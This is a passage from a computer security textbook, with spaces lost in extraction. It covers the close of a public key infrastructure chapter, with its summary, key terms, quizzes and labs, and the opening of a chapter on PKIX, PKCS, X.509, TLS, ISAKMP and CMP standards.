Stolencertificateshavebeenimplementedinawiderangeofattacks.Malwaredesignedtoimitateantivirussoftwarehasbeenfounddatingbackto2009.TheStuxnetattackontheIraniannuclearproductionfacilityusedstolencertificatesfromthirdpartiesthatwerenotinvolvedinanywayotherthantheunwittingcontributionofapasskeyintheformofacertificate.InlessthanamonthaftertheSonyPicturesEntertainmentattackbecamepublicin2014,malwareusingSonycertificatesappeared.Whetherthecertificatescamefromthebreak-inoroneofthepreviousSonyhacksisunknown,buttheresultisthesame.
Chapter6Review
LabBookExercise
Thefollowinglabexercisefromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providespracticalapplicationofmaterialcoveredinthischapter:
Lab8.5wUsingIPsecinWindows
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutpublickeyinfrastructures.
Implementthebasicsofpublickeyinfrastructures
PKIsolutionsincludecertificateauthorities(CAs)andregistrationauthorities(RAs).
PKIsformthecentralmanagementfunctionalityusedtoenableencryptiontechnologies.
Thestepsauserperformstoobtainacertificateforusearelistedinthetextandareimportanttomemorize.
Describetheroleofregistrationauthorities
RAsverifyidentitiestobeusedoncertificates.
RAspassidentityinformationtoCAsforuseinbindingtoacertificate.
Usedigitalcertificates
Certificatesarehandledviaacertificateserverandclientsoftware.
Therearethreeclassesofcertificatesandtheyhavethefollowingtypicaluses:
Class1Personale-mailuseClass2Softwaresigning
Class3SettingupaCAUnderstandthelifecycleofcertificates
Certificatesaregenerated,registered,andhistoricallyverifiedbytheoriginatingCA.
Therearetwomainmechanismstomanagetherevocationofacertificate:CRLandOCSP.
Keys,andhencecertificates,havealifecycle;theyarecreated,usedforadefinedperiodoftime,andthendestroyed.
Explaintherelationshipbetweentrustandcertificateverification
Trustisbasedonanunderstandingoftheneedsoftheuserandwhattheitembeingtrustedoffers.
Certificateverificationprovidesassurancethatthedatainthecertificateisvalid,notwhetheritmeetstheneedsoftheuser.
Describetherolesofcertificateauthoritiesandcertificaterepositories
CAscreatecertificatesforidentifiedentitiesandmaintainrecordsoftheirissuanceandrevocation.
CRLsprovideameansoflettingusersknowwhencertificateshavebeenrevokedbeforetheirend-of-lifedate.
Identifycentralizedanddecentralizedinfrastructures
TherearethreedifferentarchitecturesofCAs:
Hierarchical
Peer-to-peer
Hybrid
MultipleCAscanbeusedtogethertocreateaweboftrust.
Describepublicandin-housecertificateauthorities
PublicCAsexistasaservicethatallowsentitiestoobtaincertificatesfromatrustedthirdparty.
In-housecertificatesprovidecertificatesthatallowafirmameanstousecertificateswithincompanyborders.
KeyTermsauthorityrevocationlist(ARL)(142)CAcertificate(136)certificate(128)certificateauthority(CA)(130)certificatepath(158)certificaterepository(143)certificaterevocationlist(CRL)(140)certificateserver(131)certificatesigningrequest(CSR)(138)certificationpracticesstatement(CPS)(131)cross-certificationcertificate(137)digitalcertificate(130)dualcontrol(150)end-entitycertificate(136)hardwaresecuritymodule(HSM)(147)hierarchicaltrustmodel(157)hybridtrustmodel(159)keyarchiving(150)keyescrow(150)keyrecovery(150)localregistrationauthority(LRA)(132)OnlineCertificateStatusProtocol(OCSP)(142)
peer-to-peertrustmodel(158)policycertificate(137)publickeyinfrastructure(PKI)(129)registrationauthority(RA)(131)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.The_______________isthetrustedauthorityforcertifyingindividuals’identitiesandcreatinganelectronicdocumentindicatingthatindividualsarewhotheysaytheyare.
2.A(n)_______________istheactualrequesttoaCAcontainingapublickeyandtherequisiteinformationneededtogenerateacertificate.
3.The_______________isamethodofdeterminingwhetheracertificatehasbeenrevokedthatdoesnotrequirelocalmachinestorageofCRLs.
4.The_______________istheactualservicethatissuescertificatesbasedonthedataprovidedduringtheinitialregistrationprocess.
5.Aphysicaldevicethatsafeguardscryptographickeysiscalleda(n)_______________.
6.A(n)_______________isaholdingplaceforindividuals’certificatesandpublickeysthatareparticipatinginaparticularPKIenvironment.
7.A(n)_______________isusedwhenindependentCAsestablishpeer-to-peertrustrelationships.
8.A(n)_______________isastructurethatprovidesallofthenecessarycomponentsfordifferenttypesofusersandentitiestobe
abletocommunicatesecurelyandinapredictablemanner.
9._______________istheprocessofgivingkeystoathirdpartysothattheycandecryptandreadsensitiveinformationiftheneedarises.
10.Ina(n)_______________,oneCAisnotsubordinatetoanotherCA,andthereisnoestablishedtrustanchorbetweentheCAsinvolved.
Multiple-ChoiceQuiz1.WhenauserwantstoparticipateinaPKI,whatcomponentdoeshe
orsheneedtoobtain,andhowdoesthathappen?
A.TheusersubmitsacertificaterequesttotheCA.
B.TheusersubmitsakeypairrequesttotheCRL.
C.TheusersubmitsacertificaterequesttotheRA.
D.TheusersubmitsproofofidentificationtotheCA.
2.Howdoesauservalidateadigitalcertificatethatisreceivedfromanotheruser?
A.TheuserfirstseeswhetherhersystemhasbeenconfiguredtotrusttheCAthatdigitallysignedtheotheruser’scertificateandthenvalidatesthatCA’sdigitalsignature.
B.Theusercalculatesamessagedigestandcomparesittotheoneattachedtothemessage.
C.TheuserfirstseeswhetherhersystemhasbeenconfiguredtotrusttheCAthatdigitallysignedthecertificateandthenvalidatesthepublickeythatisembeddedwithinthecertificate.
D.Theuservalidatesthesender’sdigitalsignatureonthemessage.
3.Whatisthepurposeofadigitalcertificate?
A.ItbindsaCAtoauser’sidentity.
B.ItbindsaCA’sidentitytothecorrectRA.
C.ItbindsanindividualidentitytoanRA.
D.Itbindsanindividualidentitytoapublickey.
4.Whatstepsdoesauser’ssoftwaretaketovalidateaCA’sdigitalsignatureonadigitalcertificate?
A.Theuser’ssoftwarecreatesamessagedigestforthedigitalcertificateanddecryptstheencryptedmessagedigestincludedwithinthedigitalcertificate.Ifthedecryptionperformsproperlyandthemessagedigestvaluesarethesame,thecertificateisvalidated.
B.Theuser’ssoftwarecreatesamessagedigestforthedigitalsignatureandencryptsthemessagedigestincludedwithinthedigitalcertificate.Iftheencryptionperformsproperlyandthemessagedigestvaluesarethesame,thecertificateisvalidated.
C.Theuser’ssoftwarecreatesamessagedigestforthedigitalcertificateanddecryptstheencryptedmessagedigestincludedwithinthedigitalcertificate.IftheusercanencryptthemessagedigestproperlywiththeCA’sprivatekeyandthemessagedigestvaluesarethesame,thecertificateisvalidated.
D.Theuser’ssoftwarecreatesamessagedigestforthedigitalsignatureandencryptsthemessagedigestwithitsprivatekey.Ifthedecryptionperformsproperlyandthemessagedigestvaluesarethesame,thecertificateisvalidated.
5.Whywouldacompanyimplementakeyarchivingandrecoverysystemwithintheorganization?
A.Tomakesurealldataencryptionkeysareavailableforthecompanyifandwhenitneedsthem
B.Tomakesurealldigitalsignaturekeysareavailableforthecompanyifandwhenitneedsthem
C.Tocreatesessionkeysforuserstobeabletoaccesswhentheyneedtoencryptbulkdata
D.TobackuptheRA’sprivatekeyforretrievalpurposes
6.WithinaPKIenvironment,wheredoesthemajorityofthetrustactuallylie?
A.AllusersanddeviceswithinanenvironmenttrusttheRA,whichallowsthemtoindirectlytrusteachother.
B.AllusersanddeviceswithinanenvironmenttrusttheCA,whichallowsthemtoindirectlytrusteachother.
C.AllusersanddeviceswithinanenvironmenttrusttheCRL,whichallowsthemtoindirectlytrusteachother.
D.AllusersanddeviceswithinanenvironmenttrusttheCPS,whichallowsthemtoindirectlytrusteachother.
7.Whichofthefollowingproperlydescribeswhatapublickeyinfrastructure(PKI)actuallyis?
A.Aprotocolwrittentoworkwithalargesubsetofalgorithms,applications,andprotocols
B.Analgorithmthatcreatespublic/privatekeypairs
C.Aframeworkthatoutlinesspecifictechnologiesandalgorithmsthatmustbeused
D.Aframeworkthatdoesnotspecifyanytechnologiesbutprovidesafoundationforconfidentiality,integrity,andavailabilityservices
8.Onceanindividualvalidatesanotherindividual’scertificate,whatistheuseofthepublickeythatisextractedfromthisdigital
certificate?
A.Thepublickeyisnowavailabletousetocreatedigitalsignatures.
B.Theusercannowencryptsessionkeysandmessageswiththispublickeyandcanvalidatethesender’sdigitalsignatures.
C.Thepublickeyisnowavailabletoencryptfuturedigitalcertificatesthatneedtobevalidated.
D.Theusercannowencryptprivatekeysthatneedtobetransmittedsecurely.
9.Whywouldadigitalcertificatebeaddedtoacertificaterevocationlist(CRL)?
A.Ifthepublickeyhadbecomecompromisedinapublicrepository
B.Iftheprivatekeyhadbecomecompromised
C.Ifanewemployeejoinedthecompanyandreceivedanewcertificate
D.Ifthecertificateexpired
10.HowcanusershavefaiththattheCRLwasnotmodifiedtopresentincorrectinformation?
A.TheCRLisdigitallysignedbytheCA.
B.TheCRLisencryptedbytheCA.
C.TheCRLisopenforanyonetopostcertificateinformationto.
D.TheCRLisaccessibleonlytotheCA.
EssayQuiz
1.Describetheprosandconsofestablishingakeyarchivingsystemprogramforasmall-tomedium-sizedbusiness.
2.Whywouldasmall-tomedium-sizedfirmimplementaPKIsolution?Whatbusinessbenefitswouldensuefromsuchacourseofaction?
3.Describethestepsinvolvedinverifyingacertificate’svalidity.4.Describethestepsinobtainingacertificate.5.Compareandcontrastthehierarchicaltrustmodel,peer-to-peertrust
model,andhybridtrustmodel.
LabProjects
•LabProject6.1InvestigatetheprocessofobtainingapersonalcertificateordigitalIDfore-mailusage.Whatinformationisneeded,whatarethecosts,andwhatprotectionisaffordedbasedonthevendor?
•LabProject6.2Determinewhatcertificatesareregisteredwiththebrowserinstanceonyourcomputer.
chapter7 PKIStandardsandProtocols
Thenicethingaboutstandardsisthatyouhavesomanytochoosefrom.
—ANDREWS.TANENBAUM
N
Inthischapter,youwilllearnhowto
IdentifythestandardsinvolvedinestablishinganinteroperableInternetPKI
ExplaininteroperabilityissueswithPKIstandards
DescribehowthecommonInternetprotocolsimplementthePKIstandards
oneofthestillsteadilygrowingInternetcommercewouldbepossiblewithouttheuseofstandardsandprotocolsthatprovideacommon,interoperableenvironmentforexchanginginformationsecurely.Due
tothewidedistributionofInternetusersandbusinesses,themostpracticalsolutiontodatehasbeenthecommercialimplementationofpublickeyinfrastructures(PKIs).Thischapterexaminesthestandardsandprotocolsinvolvedinsecure
Internettransactionsande-businessusingaPKI.Althoughyoumayuseonlyaportionoftherelatedstandardsandprotocolsonadailybasis,youshouldunderstandhowtheyinteracttoprovidetheservicesthatarecriticalforsecurity:confidentiality,integrity,availability,authentication,andnonrepudiation.Thischapterwillalsoincludesomerelatedstandards,suchasFIPSandtheCommonCriteria.
Chapter6introducedthealgorithmsandtechniquesusedtoimplementapublicPKI,but,asyouprobablynoticed,thereisalotofroomforinterpretation.VariousorganizationshavedevelopedandimplementedstandardsandprotocolsthathavebeenacceptedasthebasisforsecureinteractioninaPKIenvironment.Thesestandardsfallintothreegeneralcategories:
TechTip
RevolutionaryTechnologiesThe1976publicdisclosureofasymmetrickeyalgorithmsbyDiffie,Hellman,Rivest,Shamir,
andAdlemanchangedsecurecommunicationsinaworld-shatteringway.Itwasatechnologythatmettheneedofanotheremergingtechnology;thedevelopmentoftheInternetduringthissametimeledtotheneedforsecurecommunicationsbetweenanonymousparties—combined,atechnologicallyrevolutionaryevent.
StandardsthatdefinethePKIThesestandardsdefinethedataanddatastructuresexchangedandthemeansformanagingthatdatatoprovidethefunctionsofthePKI(certificateissuance,storage,revocation,registration,andmanagement).
StandardsthatdefinetheinterfacebetweenapplicationsandtheunderlyingPKIThesestandardsusethePKItoestablishtheservicesrequiredbyapplications(S/MIME,SSL,andTLS).
OtherstandardsThesestandardsdon’tfitneatlyineitheroftheothertwocategories.Theyprovidebitsandpiecesthatglueeverythingtogether;theynotonlycanaddressthePKIstructureandthemethodsandprotocolsforusingit,butcanalsoprovideanoverarchingbusinessprocessenvironmentforPKIimplementation(forexample,ISO/IEC27002,CommonCriteria,andtheFederalInformationProcessingStandardsPublications[FIPSPUBS]).
Figure7.1showstherelationshipsbetweenthesestandardsandprotocolsandconveystheinterdependenceofthestandardsandprotocolsdiscussedinthischapter.TheInternetpublickeyinfrastructure(PKI)reliesonthreemainstandardsforestablishinginteroperablePKIservices:PKIX.509(PKIX),PublicKeyCryptographyStandards(PKCS),andX.509.OtherprotocolsandstandardshelpdefinethemanagementandoperationofthePKIandrelatedservices—InternetSecurityAssociationandKeyManagementProtocol(ISAKMP)andXMLKeyManagementSpecification(XKMS)arebothkeymanagementprotocols,whileCertificateManagementProtocol(CMP)isusedformanagingcertificates.CertificateEnrollmentProtocol(CEP)isanalternativecertificateissuance,distribution,andrevocationmechanism.Finally,PrettyGoodPrivacy(PGP)providesanalternativemethodspanningtheprotocoland
applicationlevels.
•Figure7.1RelationshipsbetweenPKIstandardsandprotocols
Thischapterexamineseachstandardfromthebottomup,startingwithbuildinganinfrastructurethroughprotocolsandapplications,andfinishingwithsomeoftheinherentweaknessesofandpotentialattacksonaPKI.
PKIXandPKCSTwomainstandardshaveevolvedovertimetoimplementPKIsonapracticallevelontheInternet.BotharebasedontheX.509certificatestandard(discussedshortlyinthe“X.509”section)andestablishcomplementarystandardsforimplementingPKIs.PKIXandPKCSintertwinetodefinethemostcommonlyusedsetofstandards.PKIXwasproducedbytheInternetEngineeringTaskForce(IETF)and
definesstandardsforinteractionsandoperationsforfourcomponenttypes:theuser(end-entity),certificateauthority(CA),registrationauthority(RA),andtherepositoryforcertificatesandcertificaterevocationlists(CRLs).PKCSdefinesmanyofthelower-levelstandardsformessagesyntax,cryptographicalgorithms,andthelike.ThePKCSsetofstandardsisaproductofRSASecurity.ThePKIXworkinggroupwasformedin1995todevelopthestandards
necessarytosupportPKIs.Atthetime,theX.509PublicKeyCertificate(PKC)formatwasproposedasthebasisforaPKI.X.509includesinformationregardingdataformatsandproceduresusedforCA-signedPKCs,butitdoesn’tspecifyvaluesorformatsformanyofthefieldswithinthePKC.PKIXprovidesstandardsforextendingandusingX.509v3certificatesandformanagingthem,enablinginteroperabilitybetweenPKIsfollowingthestandards.PKIXusesthemodelshowninFigure7.2forrepresentingthe
componentsandusersofaPKI.Theuser,calledanend-entity,isnotpartofthePKI,butend-entitiesareeitherusersofthePKIcertificates,thesubjectofacertificate(anentityidentifiedbyit),orboth.Thecertificateauthority(CA)isresponsibleforissuing,storing,andrevokingcertificates—bothPKCsandAttributeCertificates(ACs).TheRAisresponsibleformanagementactivitiesdesignatedbytheCA.TheRAcan,infact,beacomponentoftheCAratherthanaseparatecomponent.ThefinalcomponentofthePKIXmodelistherepository,asystemorgroupofdistributedsystemsthatprovidescertificatesandCRLstotheend-entities.Thecertificaterevocationlist(CRL)isadigitallysignedobjectthatlists
allofthecurrentbutrevokedcertificatesissuedbyaCA.
•Figure7.2ThePKIXmodel
TechTip
PKIEssentialsAPKIbringstogetherpolicies,procedures,hardware,software,andenduserstocreate,manage,store,distribute,andrevokedigitalcertificates.
PKIXStandardsNowthatwehavelookedathowPKIXisorganized,let’stakealookat
whatPKIXdoes.UsingX.509v3,thePKIXworkinggroupaddressesfivemajorareas:
PKIXoutlinescertificateextensionsandcontentnotcoveredbyX.509v3andtheformatofversion2CRLs,thusprovidingcompatibilitystandardsforsharingcertificatesandCRLsbetweenCAsandend-entitiesindifferentPKIs.ThePKIXprofileoftheX.509v3PKCdescribesthecontents,requiredextensions,optionalextensions,andextensionsthatneednotbeimplemented.ThePKIXprofilesuggestsarangeofvaluesformanyextensions.Inaddition,PKIXprovidesaprofileforversion2CRLs,allowingdifferentPKIstosharerevocationinformation.
PKIXprovidescertificatemanagementmessageformatsandprotocols,definingthedatastructures,managementmessages,andmanagementfunctionsforPKIs.Theworkinggroupalsoaddressestheassumptionsandrestrictionsoftheirprotocols.ThisstandardidentifiestheprotocolsnecessarytosupportonlineinteractionsbetweenentitiesinthePKIXmodel.Themanagementprotocolssupportfunctionsforentityregistration,initializationofthecertificate(possiblykey-pairgeneration),issuanceofthecertificate,key-pairupdate,certificaterevocation,cross-certification(betweenCAs),andkey-pairrecoveryifavailable.
PKIXoutlinescertificatepoliciesandcertificationpracticesstatements(CPSs),establishingtherelationshipbetweenpoliciesandCPSs.Apolicyisasetofrulesthathelpsdeterminetheapplicabilityofacertificatetoanend-entity.Forexample,acertificateforhandlingroutineinformationwouldprobablyhaveapolicyoncreation,storage,andmanagementofkeypairsquitedifferentfromapolicyforcertificatesusedinfinancialtransactions,duetothesensitivityofthefinancialinformation.ACPSexplainsthepracticesusedbyaCAtoissuecertificates.Inotherwords,theCPSisthemethodusedtogetthecertificate,whilethepolicydefinessomecharacteristicsofthecertificateandhowitwillbehandledandused.
PKIXspecifiesoperationalprotocols,definingtheprotocolsforcertificatehandling.Inparticular,protocoldefinitionsarespecifiedforusingFileTransferProtocol(FTP)andHypertextTransferProtocol(HTTP)toretrievecertificatesfromrepositories.Thesearethemostcommonprotocolsforapplicationstousewhenretrievingcertificates.
PKIXincludestime-stampinganddatacertificationandvalidationservices,whichareareasofinteresttothePKIXworkinggroup,andwhichwillprobablygrowinuseovertime.Atimestampauthority(TSA)certifiesthataparticularentityexistedataparticulartime.ADataValidationandCertificationServer(DVCS)certifiesthevalidityofsigneddocuments,PKCs,andthepossessionorexistenceofdata.Thesecapabilitiessupportnonrepudiationrequirementsandareconsideredbuildingblocksforanonrepudiationservice.
PKCsarethemostcommonlyusedcertificates,butthePKIXworkinggrouphasbeenworkingontwoothertypesofcertificates:AttributeCertificatesandQualifiedCertificates.AnAttributeCertificate(AC)isusedtograntpermissionsusingrule-based,role-based,andrank-basedaccesscontrols.ACsareusedtoimplementaprivilegemanagementinfrastructure(PMI).InaPMI,anentity(user,program,system,andsoon)istypicallyidentifiedasaclienttoaserverusingaPKC.Therearethentwopossibilities:eithertheidentifiedclientpushesanACtotheserver,ortheservercanqueryatrustedrepositorytoretrievetheattributesoftheclient.ThissituationismodeledinFigure7.3.
•Figure7.3ThePKIXPMImodel
TheclientpushoftheAChastheeffectofimprovingperformance,butnoindependentverificationoftheclient’spermissionsisinitiatedbytheserver.ThealternativeistohavetheserverpulltheinformationfromanACissuerorarepository.Thismethodispreferablefromasecuritystandpoint,becausetheserverorserver’sdomaindeterminestheclient’saccessrights.Thepullmethodhastheaddedbenefitofrequiringnochangestotheclientsoftware.TheQualifiedCertificate(QC)isbasedonthetermusedwithinthe
EuropeanCommissiontoidentifycertificateswithspecificlegislativeuses.ThisconceptisgeneralizedinthePKIXQCprofiletoindicateacertificateusedtoidentifyaspecificindividual(asinglehumanratherthantheentityofthePKC)withahighlevelofassuranceinanonrepudiationservice.TherearedozensofIETFRequestsforComment(RFCs)thathavebeen
producedbythePKIXworkinggroupforeachofthesefiveareas.
ForacompletelistofcurrentandpendingdocumentsassociatedwithPKIX,seetheInternetdraftforthePKIXworkinggrouproadmap(https://www.ietf.org/archive/id/draft-ietf-pkix-roadmap-09.txt/).
PKCSRSALaboratoriescreatedthePublicKeyCryptographyStandards(PKCS)tofillsomeofthegapsinthestandardsthatexistedinPKIimplementation.AstheyhavewiththePKIXstandards,PKIdevelopershaveadoptedmanyofthesestandardsasabasisforachievinginteroperabilitybetweendifferentCAs.PKCSiscomposedofasetof(currently)13activestandards,with2otherstandardsthatarenolongeractive.ThestandardsarereferredtoasPKCS#1throughPKCS#15,aslistedinTable7.1.ThestandardscombinetoestablishacommonbaseforservicesrequiredinaPKI.
Table7.1 PKCSStandards
ThoughadoptedearlyinthedevelopmentofPKIs,someofthesestandardsarebeingphasedout.Forexample,PKCS#6isbeingreplacedbyX.509v3(coveredshortlyinthe“X.509”section)andPKCS#7andPKCS#10arebeingusedless,astheirPKIXcounterpartsarebeingadopted.
WhyYouNeedtoKnowthePKIXandPKCSStandardsIfyourcompanyisplanningtouseoneoftheexistingcertificateserverstosupporte-commerce,youmaynotneedtoknowthespecificsofthesestandards(exceptperhapsfortheCompTIASecurity+exam).However,ifyouplantoimplementaprivatePKItosupportsecureserviceswithinyourorganization,youneedtounderstandwhatstandardsareoutthereandhowthedecisiontouseaparticularPKIimplementation(eitherhomegrownorcommercial)mayleadtoincompatibilitieswithothercertificate-issuingentities.Youmustconsideryourbusiness-to-businessrequirementswhenyou’redecidinghowtoimplementaPKIwithinyourorganization.
ExamTip:Allofthestandardsandprotocolsdiscussedinthischapterarethe“vocabulary”ofthecomputersecurityindustry.Youshouldbewellversedinallthesetitlesandtheirpurposesandoperations.
TechTip
X.509EssentialsX.509specifiesstandardformatsforpublickeycertificates,certificaterevocationlists,andAttributeCertificates.
X.509Whatisacertificate?AsexplainedinChapter6,acertificateismerelyadatastructurethatbindsapublickeytosubjects(uniquenames,DNSentries,ore-mails)andisusedtoauthenticatethatapublickeyindeedbelongstothesubject.Inthelate1980s,theX.500OSIDirectoryStandardwasdefinedbytheInternationalOrganizationforStandardization(ISO)andtheInternationalTelecommunicationUnion(ITU).Itwasdevelopedforimplementinganetworkdirectorysystem,andpartofthisdirectorystandardwastheconceptofauthenticationofentitieswithinthedirectory.X.509istheportionoftheX.500standardthataddressesthestructureofcertificatesusedforauthentication.SeveralversionsoftheX.509certificateshavebeencreated,with
version3beingthecurrentversion(asthisisbeingwritten).EachversionhasextendedthecontentsofthecertificatestoincludeadditionalinformationnecessarytousecertificatesinaPKI.TheoriginalITUX.509definitionwaspublishedin1988,wasformerlyreferredtoasCCITTX.509,andissometimesreferredtoasISO/IEC/ITU9594-8.Version3addedadditionaloptionalextensionsformoresubjectidentificationinformation,keyattributeinformation,policyinformation,andcertificationpathconstraints.Inaddition,version3allowsadditionalextensionstobedefinedinstandardsortobedefinedandregisteredbyorganizationsorcommunities.Certificatesareusedtoencapsulatetheinformationneededto
authenticateanentity.TheX.509specificationdefinesahierarchicalcertificationstructurethatreliesonarootCAthatisself-certifying(meaningitissuesitsowncertificate).Allothercertificatescanbetracedbacktosucharootthroughapath.ACAissuesacertificatetoauniquelyidentifiableentity(person,corporation,computer,andsoon)—issuingacertificateto“JohnSmith”wouldcausesomerealproblemsifthatwerealltheinformationtheCAhadwhenissuingthecertificate.WearesavedsomewhatbytherequirementthattheCAdetermineswhatidentifierisunique(thedistinguishedname),butwhencertificatesandtrustare
extendedbetweenCAs,theuniqueidentificationbecomescritical.
CrossCheckCertificatesAdetaileddescriptionofcertificatesandthesupportingpublickeyinfrastructureisprovidedinChapter6.
SSL/TLSSecureSocketsLayer(SSL)andTransportLayerSecurity(TLS)providethemostcommonmeansofinteractingwithaPKIandcertificates.Theolder,SSLprotocolwasintroducedbyNetscapeasameansofprovidingsecureconnectionsforwebtransfersusingencryption.Thesetwoprotocolsprovidesecureconnectionsbetweentheclientandserverforexchanginginformation.Theyalsoprovideserverauthentication(andoptionally,clientauthentication)andconfidentialityofinformationtransfers.SeeChapter17foradetailedexplanation.
TechTip
SSL/TLSSimplifiedSSLandTLSarecryptographicprotocolstoprovidedataintegrityandsecurityovernetworksbyencryptingnetworkconnectionsatthetransportlayer.InmanycasespeopleusethetermSSLevenwhenTLSisinfacttheprotocolbeingused.
TheIETFestablishedtheTLSworkinggroupin1996todevelopastandardtransportlayersecurityprotocol.TheworkinggroupbeganwithSSLversion3.0asitsbasisandreleasedRFC2246,“TheTLSProtocolVersion1.0,”in1999asaproposedstandard.TheworkinggroupalsopublishedRFC2712,“AdditionofKerberosCipherSuitestoTransport
LayerSecurity(TLS),”asaproposedstandard,andtwoRFCsontheuseofTLSwithHTTP.Likeitspredecessor,TLSisaprotocolthatensuresprivacybetweencommunicatingapplicationsandtheirusersontheInternet.Whenaserverandclientcommunicate,TLSensuresthatnothirdpartycaneavesdroportamperwithanymessage.
SSLisdeprecated.AllversionsofSSL,includingv3,haveexploitablevulnerabilitiesthatmaketheprotocolnolongerconsideredsecure.Foralltrafficwhereconfidentialityisimportant,youshoulduseTLS.
TLSiscomposedoftwoparts:theTLSRecordProtocolandtheTLSHandshakeProtocol.TheTLSRecordProtocolprovidesconnectionsecuritybyusingsupportedencryptionmethods.TheTLSRecordProtocolcanalsobeusedwithoutencryption.TheTLSHandshakeProtocolallowstheserverandclienttoauthenticateeachotherandtonegotiateasessionencryptionalgorithmandcryptographickeysbeforedataisexchanged.ThoughTLSisbasedonSSLandissometimesreferredtoasSSL,they
arenotinteroperable.However,theTLSprotocoldoescontainamechanismthatallowsaTLSimplementationtobackdowntoSSL3.0.Thedifferencebetweenthetwoisthewaytheyperformkeyexpansionandmessageauthenticationcomputations.TheTLSRecordProtocolisalayeredprotocol.Ateachlayer,messagesmayincludefieldsforlength,description,andcontent.TheRecordProtocoltakesmessagestobetransmitted,fragmentsthedataintomanageableblocks,optionallycompressesthedata,appliesamessageauthenticationcode(HMAC)tothedata,encryptsit,andtransmitstheresult.Receiveddataisdecrypted,verified,decompressed,andreassembled,andthendeliveredtohigher-levelclients.TheTLSHandshakeProtocolinvolvesthefollowingsteps,whichare
summarizedinFigure7.4:
•Figure7.4TLSHandshakeProtocol
1.Exchangehellomessagestoagreeonalgorithms,exchangerandomvalues,andcheckforsessionresumption.
2.Exchangethenecessarycryptographicparameterstoallowtheclientandservertoagreeonapre-mastersecret.
3.Exchangecertificatesandcryptographicinformationtoallowtheclientandservertoauthenticatethemselves.
4.Generateamastersecretfromthepre-mastersecretandexchangerandomvalues.
5.Providesecurityparameterstotherecordlayer.6.Allowtheclientandservertoverifythattheirpeerhascalculated
thesamesecurityparametersandthatthehandshakeoccurredwithouttamperingbyanattacker.
Thoughithasbeendesignedtominimizethisrisk,TLSstillhaspotentialvulnerabilitiestoaman-in-the-middleattack.Ahighlyskilledandwell-placedattackercanforceTLStooperateatlowersecuritylevels.Regardless,throughtheuseofvalidatedandtrustedcertificates,asecureciphersuitecanbeselectedfortheexchangeofdata.Onceestablished,aTLSsessionremainsactiveaslongasdataisbeing
exchanged.Ifsufficientinactivetimehaselapsedforthesecureconnectiontotimeout,itcanbereinitiated.
TechTip
DisablingSSLBecauseallversionsofSSL,includingv3,haveexploitablevulnerabilitiesthatmaketheprotocolnolongerconsideredsecure,usersshouldnotrelyonitforsecurity.ChromenolongerusesSSL.ForInternetExplorer,youneedtounchecktheSSLboxesunderInternetOptions.
CipherSuitesInmanyapplications,theuseofcryptographyoccursasacollectionoffunctions.Differentalgorithmscanbeusedforauthentication,encryption/decryption,digitalsignatures,andhashing.Thetermciphersuitereferstoanarrangedgroupofalgorithms.Forinstance,TLShasapublishedTLSCipherSuiteRegistryatwww.iana.org/assignments/tls-
parameters/tls-parameters.xhtml.Thereisawiderangeofciphers,someoldandsomenew,eachwithits
ownstrengthsandweaknesses.Overtime,newmethodsandcomputationalabilitieschangetheviabilityofciphers.Theconceptofstrongversusweakciphersisanacknowledgmentthat,overtime,cipherscanbecomevulnerabletoattacks.Theapplicationorselectionofciphersshouldtakeintoconsiderationthatnotallciphersarestillstrong.Whenselectingacipherforuse,itisimportanttomakeanappropriatechoice.Forexample,ifaserveroffersSSLv3andTLS,youshouldchooseTLSonly,asSSLv3hasbeenshowntobevulnerable.
ISAKMPTheInternetSecurityAssociationandKeyManagementProtocol(ISAKMP)providesamethodforimplementingakeyexchangeprotocolandfornegotiatingasecuritypolicy.Itdefinesproceduresandpacketformatstonegotiate,establish,modify,anddeletesecurityassociates.Becauseitisaframework,itdoesn’tdefineimplementation-specificprotocols,suchasthekeyexchangeprotocolorhashfunctions.ExamplesofISAKMParetheInternetKeyExchange(IKE)protocolandIPsec,whichareusedwidelythroughouttheindustry.AnimportantdefinitionforunderstandingISAKMPisthatoftheterm
securityassociation.Asecurityassociation(SA)isarelationshipinwhichtwoormoreentitiesdefinehowtheywillcommunicatesecurely.ISAKMPisintendedtosupportSAsatalllayersofthenetworkstack.Forthisreason,ISAKMPcanbeimplementedonthetransportlayerusingTCPorUserDatagramProtocol(UDP),oritcanbeimplementedonIPdirectly.NegotiationofanSAbetweenserversoccursintwostages.First,the
entitiesagreeonhowtosecurenegotiationmessages(theISAKMPSA).Oncetheentitieshavesecuredtheirnegotiationtraffic,theythendeterminetheSAsfortheprotocolsusedfortheremainderoftheircommunications.Figure7.5showsthestructureoftheISAKMPheader.ThisheaderisusedduringbothpartsoftheISAKMPnegotiation.
•Figure7.5ISAKMPheaderformat
TheInitiatorCookieissetbytheentityrequestingtheSA,andtherespondersetstheResponderCookie.ThePayloadbyteindicatesthetypeofthefirstpayloadtobeencapsulated.Payloadtypesincludesecurityassociations,proposals,keytransforms,keyexchanges,vendoridentities,andotherthings.TheMajorandMinorRevisionfieldsrefertothemajorversionnumberandminorversionnumberfortheISAKMP.TheExchangeTypehelpsdeterminetheorderofmessagesandpayloads.TheFlagsbitsindicateoptionsfortheISAKMPexchange,includingwhetherthepayloadisencrypted,whethertheinitiatorandresponderhave“committed”totheSA,andwhetherthepacketistobeauthenticatedonly(andisnotencrypted).ThefinalfieldsoftheISAKMPheaderindicatetheMessageIdentifierandaMessageLength.PayloadsencapsulatedwithinISAKMPuseagenericheader,andeachpayloadhasitsownheaderformat.OncetheISAKMPSAisestablished,multipleprotocolSAscanbe
establishedusingthesingleISAKMPSA.Thisfeatureisvaluableduetotheoverheadassociatedwiththetwo-stagenegotiation.SAsarevalidforspecificperiodsoftime,andoncethetimeexpires,theSAmustberenegotiated.ManyresourcesarealsoavailableforspecificimplementationsofISAKMPwithintheIPsecprotocol.
CMPThePKIXCertificateManagementProtocol(CMP)isspecifiedinRFC4210.ThisprotocoldefinesthemessagesandoperationsrequiredtoprovidecertificatemanagementserviceswithinthePKIXmodel.ThoughpartoftheIETFPKIXeffort,CMPprovidesaframeworkthatworkswellwithotherstandards,suchasPKCS#7andPKCS#10.
TechTip
CMPSummarizedCMPisaprotocoltoobtainX.509certificatesinaPKI.
CMPprovidesforthefollowingcertificateoperations:CAestablishment,includingcreationoftheinitialCRLandexportofthepublickeyfortheCA
Certificationofanend-entity,includingthefollowing:
Initialregistrationandcertificationoftheend-entity(registration,certificateissuance,andplacementofthecertificateinarepository)
